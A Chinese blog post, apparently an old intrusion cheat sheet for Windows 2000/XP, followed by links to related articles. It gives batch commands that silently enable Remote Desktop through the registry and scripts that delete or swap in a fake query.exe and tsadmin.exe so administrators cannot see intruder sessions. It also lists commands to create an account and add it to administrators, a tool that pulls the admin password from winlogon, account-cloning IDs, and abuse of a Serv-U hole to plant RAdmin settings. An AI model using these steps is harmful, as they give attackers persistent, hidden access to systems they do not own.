2000 XP 开3389

最新推荐文章于 2023-08-20 13:52:29 发布
最新推荐文章于 2023-08-20 13:52:29 发布
阅读量2.2k 收藏
点赞数
文章标签: xp windows 终端 query user server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meiyouhuiyi/article/details/917385
版权


echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>> 3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
 regedit /s 3389.reg

列举进程的脚本。
 
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts://./root/cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript ps.vbs

ntsd -c q -p 200

 

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
regedit /s 3389.reg

查询终端服务端口:reg query "HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-TCP-PortNumber"

 

 

登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:/winnt/system32/query.exe c:/winnt/system32/com/1/que.exe
@del c:/winnt/system32/query.exe
@del %SYSTEMROOT%/system32/dllcache/query.exe
@copy c:/winnt/system32/com/1/query.exe c:/winnt/system32/query.exe //复制一个假的

@echo off
@copy c:/winnt/system32/tsadmin.exe c:/winnt/system32/com/1/tsadmin.exe
@del c:/winnt/system32/tsadmin.exe
@del %SYSTEMROOT%/system32/dllcache/tsadmin.exe

 

 

 

一些很有用的老知识
type c:/boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8


如果对方没开3389,但是装了Remote Administrator Service
用这个命令F:/ftp.exe "regedit -s F:/longyi.biz/RAdmin.reg" 连接
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:/ftp.exe "regedit -e F:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin"
 

meiyouhuiyi
关注
免防火墙开启3389
12-30
免防火墙开启3389
XP系统开启3389多用户登录
08-20 769
1、去除XP的系统文件保护,修改他的注册表(防止我们修改文件时弹出提示框来) echo Windows Registry Editor Version 5.00>>修改.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>修改.reg echo "SFCDisable"=dw
XP如何开启3389端口远程桌面
weixin_30413739的博客
11-02 463
http://zhidao.baidu.com/question/311670471.html 在Windows 2000/XP/Server 2003中要查看端口,可以使用Netstat命令:依次点击“始→运行”,键入“cmd”并回车,打命令提示符窗口。在命令提示符状态下键入“netstat -a -n”,按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。 ...
3389开启关闭-----批处理开启或者关闭3389端口
10-30
3389开启关闭-----批处理开启或者关闭3389端口
如何修改XP 远程管理默认端口
09-16
随着Windows XP的推出,终端服务得到了进一步增强,特别是其客户端程序(Terminal Server Client)相比Windows 2000版本有了显著改进: 1. **音视频回传**:能够在本地听到目标机器上的声音。 2. **真色彩与全屏...
修改服务器3389远程登陆端口
10-01
下面将详细介绍如何修改Windows 2000Windows XP/2003下的远程登陆端口号。 Windows 2000下的修改办法 在Windows 2000中,远程登陆端口号可以通过注册表修改。具体步骤如下: 1. 运行regedit,找到[HKEY_LOCAL_...
远程桌面向导(适用XP\2000\2003\WIN7)
01-08
适用于XP2000、2003以及WIN7等较早版本的Windows系统,它为系统管理员和技术支持人员提供了极大的便利。 在Windows XP2000、2003和WIN7中,远程桌面功能主要基于微软的终端服务(Terminal Services),后来在...
渗透-------五种远程开启3389端口方法
weixin_34392435的博客
07-30 5266
3389端口是远程登入使用的默认端口,在渗透测试和系统安全配置中起到举足轻重的地位。因此,这里根据资料和个人见解整理了几种远程打3389端口的方法,仅做参考! 以下共五种方法,其中一、四针对服务,二、三、五使用应用软件,希望对你有帮助。 一、打记事本,编辑内容如下: echo[Components]>c:\sql echoTSEnable=on>>c:\sql ...
xp设置远程连接的方法
04-07
- **客户端**:是指用于发起远程连接请求的计算机,可以运行 Windows 95/98/2000/ME 等多种操作系统。 #### 四、配置远程桌面连接 ##### 1. 服务器端配置 **第一步:为用户账户添加密码** - 打“控制面板” →...
windows2000-2003开启和更改3389端口
weixin_30823227的博客
04-08 178
windows2000开启3389端口:c:\>echo [Components] > c:\rock c:\>echo TSEnable = on >> c:\rock c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q 等会系统自动启动后就OKwindows2003开启3389端口:HKEY_L...
win2k的3389端口攻击
xuzhiqjy的专栏
04-11 938
WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。  WIN2000终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服
内网渗透测试:初探远程桌面的安全问题
最新发布
qq_53058639的博客
08-20 1152
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择 3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。文中若有不当之处还请各位大佬多多点评。
获取Windows远程桌面端口
weixin_53641036的博客
09-08 5233
对远程桌面的默认端口进行修改,可以在注册表中进行手工修改。在重启前要对新的端口进行放行,不然端口变更后远程就无法访问了。最终远程桌面端口的放行还与防火墙策略有关,有些管理员会在防火墙策略中只对管理员的IP放行,此时远程桌面只对管理员所属IP放,其他人没有权限访问远程桌面服务。Windows的默认远程桌面使用的端口是3389,如果管理员更改了默认端口,此时想获取默认端口就需要查询注册表。本地可以通过 netstat 查看本地放的端口,从外部则只能通过端口扫描工具进行扫描。
红队常见REG指令操作
不忘初心,护天下安全!
07-08 635
reg.exe是windows操作注册表的命令行工具,是红队在后渗透阶段最常使用的途径之一。这里进行总结,方便红队同学进行深入,也方便蓝方进行恶意指令收集。查看REP服务是否开启,1关闭, 0开启通过注册表查看RDP端口或者:如果发现 3389 并没有开启,我们使用以下方式开启它。通过修改注册表来设置一下允许远程桌面连接:如果出现: 需要关闭鉴权模式,我们采用如下命令,这里0代表关闭,1代表开启(即取消 “仅允许运行使用网络界别身份验证的远程桌面的计算机连接” 这一安全设置。) 利用哈希传递登录 RDP 远
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1505
重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
Windows server 2008 R2 服务器系统安全防御加固方法
热门推荐
花落花开,春去秋来!
12-27 1万+
一.更改终端默认端口号 步骤: 1.运行regedit 2.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds \rdpwd\Tds \tcp],看见PortNamber值了吗?其默认值是3389,修改成所希望的端口即可,例如12345 3.[HKEY_LOCAL_MACHINE\SYSTEM
内网信息收集
qq_33040633的博客
10-15 1370
内网信息收集(自动和手动)
初探MSSQL注入
要不,单步调试走起?
12-27 5115
探索MSSQL下,有了SA注入点到底能走到哪一步!
Windows 2000/XP操作系统体系结构解析
"Windows 2000_XP的体系结构深入解析" Windows 2000XP 是微软公司推出的32位操作系统,自90年代初以来,经过不断的发展和完善,它们从简单的操作系统进化成功能强大且用户友好的平台。Windows 2000/XP的成功...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值